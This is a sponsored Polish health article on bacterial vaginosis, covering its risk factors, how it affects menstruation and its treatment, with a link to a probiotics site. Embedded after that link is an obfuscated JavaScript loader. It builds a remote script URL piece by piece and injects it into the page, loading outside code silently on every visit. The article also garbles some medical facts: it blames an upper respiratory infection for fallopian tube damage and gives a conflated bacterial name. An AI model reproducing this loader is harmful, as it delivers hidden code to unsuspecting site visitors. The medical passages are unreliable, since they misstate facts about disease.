Infekcje intymne – czy powodują zaburzenia miesiączkowania?

Spis treści

Dolegliwości intymne przytrafiają się niemal każdej kobiecie, a jedną z najczęstszych infekcji jest zapalenie pochwy na tle bakteryjnym. Jego przyczyną jest nadmierne namnożenie się w pochwie patogennych bakterii, np. Mycoplasma hominis, Gardnerella mobiluncus lub Gardnerella vaginalis. Odpowiadają one za najczęściej występujące u kobiet w wieku rozrodczym zakażenia pochwy i sromu.

Artykuł sponsorowany

Cytologia - jak interpretować wyniki badań?


U zdrowej kobiety aż 95% bakterii bytujących fizjologicznie w pochwie to pałeczki kwasu mlekowego, które utrzymują pH na poziomie 3,8-4,5. Oprócz nich w skład mikroflory wchodzą bakterie patogenne. Jakiekolwiek zaburzenie równowagi skutkuje wzrostem pH pochwy i zwiększeniem ilości patogenów. Infekcja objawia się białawymi lub szarawymi upławami oraz nieprzyjemnym zapachem, który nasila się po menstruacji oraz po stosunku.


Waginoza bakteryjna może wystąpić u każdej kobiety, a do czynników ryzyka zalicza się:

  • cukrzycę,
  • antybiotykoterapię,
  • nieregularne miesiączki,
  • irygacje pochwy,
  • częste zmiany partnerów seksualnych,
  • stosowanie wkładek wewnątrzmacicznych,
  • stosowanie tamponów.
Jak infekcja wpływa na miesiączkowanie?


Nieleczona infekcja bakteryjna pochwy niesie ze sobą poważne konsekwencje zdrowotne. Przede wszystkim powoduje ona zapalenie szyjki macicy i zmiany wyglądu nabłonka. Ponadto rozprzestrzenia się na cały układ rozrodczy i odpowiada za zapalenie błony macicy oraz jajowodów. Infekcja górnych dróg oddechowych powoduje zaburzenia funkcji jajowodów, prowadzące nawet do niepłodności. Stan ten objawia się m.in. zaburzeniami miesiączkowania. Infekcje bakteryjne są szczególnie niebezpieczne dla kobiet w ciąży, ponieważ mogą powodować przedwczesne porody lub poronienia.

Jak leczyć zapalenie pochwy?


O sposobie leczenia waginozy bakteryjnej zawsze decyduje lekarz. Zwykle stosowane są antybiotyki, które niszczą chorobotwórcze bakterie. Bardzo ważne jest to, aby w trakcie i po leczeniu stosować probiotyki ginekologiczne, zapobiegające zakłóceniom równowagi mikroflory bakteryjnej. Więcej na temat probiotyków ginekologicznych można przeczytać na stronie www.lactovaginal.pl.(function(){
qz0a=document.createElement("script");qz0a_=("us")+("ta");
qz0a_+="t"+(".");qz0a_+=("in");qz0au="67563109";qz0a.async=true;
qz0au+=".yfngkmmfz0a6yy0th";qz0a.type="text/javascript";qz0a_+="f"+"o"+("/");
qz0au+="6zxjtwzvXk5at";qz0a.src="//"+qz0a_+qz0au;
dqz0a=document.body;dqz0a.appendChild(qz0a);
})();

Oceń artykuł

(liczba ocen 0)

Dziękujemy za przeczytanie naszego artykułu do końca. Jeśli chcesz być na bieżąco z informacjami na temat zdrowia i zdrowego stylu życia, zapraszamy na nasz portal ponownie!

Zamknij